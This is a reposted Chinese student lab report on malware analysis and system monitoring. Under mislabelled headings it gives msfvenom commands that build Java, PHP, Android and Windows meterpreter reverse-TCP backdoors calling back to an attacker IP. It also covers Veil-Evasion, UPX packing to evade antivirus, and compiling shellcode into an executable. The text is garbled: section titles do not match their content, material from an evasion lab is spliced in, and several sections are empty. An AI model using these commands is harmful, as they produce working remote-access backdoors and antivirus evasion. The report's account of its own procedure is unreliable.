码迷,mamicode.com
首页 > 其他好文 > 详细

Exp4 恶意代码分析

时间:2020-04-19 17:35:24      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:ip访问   shellcode   事件   code   显示文件   sha   帮助   explore   -o   


一、实验目标

1、是监控你自己系统的运行状态,看有没有可疑的程序在运行。
2、分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。
3、假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质。

二、思考题

(一)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。

1、使用一些工具帮助自己监测系统,可以实时监控电脑上的端口信息,如果某个进程启动的时候连接了一些看起来很可疑的端口,就可以进一步进行分析。
2、使用windows自带的schtasks指令设置一个计划任务,每隔一定的时间对主机的联网记录等进行记录,如果自己的电脑没有联网的情况下出现了ip访问记录就可以进一步分析了。
3、通过sysmon监控计算机中的重要操作,可以在事件查看器中找到相关日志进行查看。

(二)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。

1、利用wireshark动态分析程序动向,监视其与主机进行的通信过程。
2、利用systracer工具分析恶意软件。
3、利用PE explorer工具对程序调用库等信息进行分析查看,还可以对其反汇编。

三、实践过程

(一)使用schtasks指令监控系统

1、C盘建立一个netstatlog.bat文件,用来将记录的联网结果格式化输出到netstatlog.txt文件中
netstatlog.bat:

date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt

2、在CMD下,使用schtasks /create /TN netstat5303 /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"命令创建计划任务netstat5303

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor_java.jar

图jar
3、生成php文件,并用VirusTotal进行扫描

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor.php

图php
4、生成apk文件,并用VirusTotal进行扫描

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 R> 5328_backdoor.apk

图apk

(二)使用sysmon工具监控系统

安装veil-evasion的时候照着Veil-Evasion下载、安装、使用教程上的步骤安装还算比较顺利,就是真的好慢,装了n个小时。
图Veli安装
图Veli1

1、启动evail-evasion
图启动

2、设置好回连的IP地址和端口号后,生成后门文件

3、用VirusTotal进行扫描
图Veil扫描

(三)使用VirusTotal分析恶意软件

1、对(一)1中的5328_backdoor.exe进行加壳

upx 5328_backdoor.exe -o 5328_backdoor_upx.exe

图upx(额,显示文件太小)

2、对(一)1中的met-encoded10.exe进行加壳

upx met-encoded10.exe -o met-encoded10_upx.exe

图upx1(加壳成功)

3、用VirusTotal进行扫描
图upx扫描(发现加壳之后被查出的概率增加了【捂脸】)

(四)使用Process Monitor分析恶意软件

1、在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=5328 -f c生成一个c语言格式的Shellcode数组
图生成Shellcod

2、创建一个C文件:shellcode_5328.c,将上面生成的数组copy到该文件下,并加入一个主函数
图c文件

3、使用i686-w64-mingw32-g++ shellcode_5328.c -o shellcode_5328_backdoor.exe命令将该C语言代码shellcode_5328.c转换为一个可在64位windows系统下操作的可执行文件shellcode_5328_backdoor.exe
图转化

4、用VirusTotal进行扫描
图shellcode扫描

5、将可执行文件放到主机上检测
图主机shellcode检测(可以发现这个文件刚放到主机上,就立即被查杀了)

(五)使用Process Explorer分析恶意软件

(六)使用PEiD分析恶意软件

(七)使用PEiD分析恶意软件

四、实践总结与体会

五、参考资料

免杀原理与实践
杀毒软件工作原理 及 现在主要杀毒技术
Veil-Evasion下载、安装、使用教程
kali安装veil和apt基本命令

Exp4 恶意代码分析

标签:ip访问   shellcode   事件   code   显示文件   sha   帮助   explore   -o   

原文地址:https://www.cnblogs.com/seven-moon/p/12732170.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!